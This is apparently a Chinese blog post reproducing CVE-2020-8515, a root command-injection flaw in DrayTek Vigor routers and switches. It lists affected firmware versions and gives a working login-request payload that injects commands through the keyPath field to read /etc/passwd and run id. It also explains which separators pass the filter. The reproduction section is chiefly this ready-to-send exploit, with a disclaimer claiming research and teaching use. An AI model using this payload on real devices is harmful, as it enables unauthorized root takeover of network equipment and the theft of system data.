![v2-67158082b3e5c2483dafb55a27025a78_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/ecc9426d1b03c721dbb76dff3bab8981.jpeg)
一、漏洞描述
DrayTek URI未能正确处理SHELL字符,远程攻击者可以利用该漏洞提交特殊的请求,可以ROOT权限执行任意命令。
远程命令注入漏洞被标记为CVE-2020-8515,主要影响了DrayTek Vigor网络设备,包括企业交换机、路由器、负载均衡器和VPN网关。
二、影响范围
Vigor2960 < v1.5.1
Vigor300B < v1.5.1
Vigor3900 < v1.5.1
VigorSwitch20P2121 <= v2.3.2
VigorSwitch20G1280 <= v2.3.2
VigorSwitch20P1280 <= v2.3.2
VigorSwitch20G2280 <= v2.3.2
VigorSwitch20P2280 <= v2.3.2
三、漏洞复现
登录界面登录burp抓包:
![v2-f3d83ec6d0c3a5a1fec977da3622541a_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/997c145da6e93c6945d23dc9805e0a04.jpeg)
抓取登录数据包添加keypath的paylod的字段
payloay:
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a
在这个基础上继续研究了本漏洞支持其他可以执行的命令:
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a
shell方面,因为输入的命令是由mainfunction.cgi解析的,所以空格会被替换为“+”(存在一些困难)。
注入点涉及keyPath和rtick,和/www/cgi-bin/mainfunction.cgi文件有关,对应的web服务程序为/usr/sbin/lighttpd
主要是&符号的执行,可以进行拼接,但是|、;就不行
python脚本验证:
![v2-f17296d8da166c5b85291d827b3d5101_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/2ac07ccaf0b65e309bcff0eea90bc826.jpeg)
四、参考链接:
https://nosec.org/home/detail/4406.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8515
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
公众号:
![v2-08401c1e12264d737138ad072495622d_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/da02c7376684b48d93da250fa4d71221.jpeg)
thelostworld:
![v2-c63907909925385c02bd103dd075d597_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/4a85d9fec91355836a733c12362535f4.png)